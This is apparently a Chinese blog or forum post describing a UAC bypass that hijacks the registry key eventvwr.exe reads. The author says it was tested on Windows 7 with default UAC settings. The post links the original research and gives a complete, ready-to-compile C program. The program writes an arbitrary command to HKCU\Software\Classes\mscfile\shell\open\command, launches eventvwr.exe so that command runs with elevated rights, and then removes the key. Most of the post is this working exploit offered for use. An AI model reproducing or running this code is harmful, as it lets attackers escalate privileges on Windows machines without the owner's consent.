又一个bypass UAC的法子,测试通过win7 UAC默认
原文在:https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
简单说一下就是eventvwr.exe在启动的时候会去检查注册表的command,恰好current_user 也在其中,
只是这个项目没有创建,当前用户可以通过在 HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command添加命令在用eventvwr.exe去执行就OK了,eventvwr.exe默认是过了UAC的,所以你被执行的命令也是过UAC
作者给的是powershell的poc,我也搞了个exe的,直接上代码。
#include <stdio.h>
#include <Windows.h>
void help()
{
printf("Use: xx.exe [cmd]");
}
int main(int argc , char * argv[])
{
if (argc != 2)
{
help();
exit(0);
}
char *cmd = argv[1];
if (strlen(cmd) > MAX_PATH)
{
printf("[-]: command too long!\n");
exit(0);
}
// Reg key: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
// run pro: eventvwr
char *regpath = "Software\\Classes\\mscfile\\shell\\open\\command";
HKEY Kroot;
DWORD dwdis;
DWORD dwtype,dwsize;
char regsize[2048];
if ((RegCreateKeyEx(HKEY_CURRENT_USER,regpath,0,NULL,0,KEY_ALL_ACCESS,NULL,&Kroot,&dwdis)) != ERROR_SUCCESS)
{
printf("open reg error!\n");
return -1;
}
if ( (RegQueryValueEx(Kroot,NULL,NULL,&dwtype,(LPBYTE)regsize,&dwsize)) == ERROR_SUCCESS)
{
RegDeleteKey(HKEY_CURRENT_USER,regpath);
if ((RegCreateKeyEx(HKEY_CURRENT_USER,regpath,0,NULL,0,KEY_ALL_ACCESS,NULL,&Kroot,&dwdis)) != ERROR_SUCCESS)
{
printf("create reg error!\n");
return -1;
}
}
char syspath[MAX_PATH];
char command[MAX_PATH];
memset(command,0,MAX_PATH);
memset(syspath,0,MAX_PATH);
GetSystemDirectory(syspath,MAX_PATH);
sprintf_s(command,MAX_PATH,"%s\\cmd.exe /c %s",syspath,cmd);
// set command
RegSetValueEx(Kroot,NULL,0,REG_SZ,(BYTE *)command,sizeof(command));
// run it
system("eventvwr.exe");
//del
RegDeleteKey(HKEY_CURRENT_USER,regpath);
RegCloseKey(Kroot);
}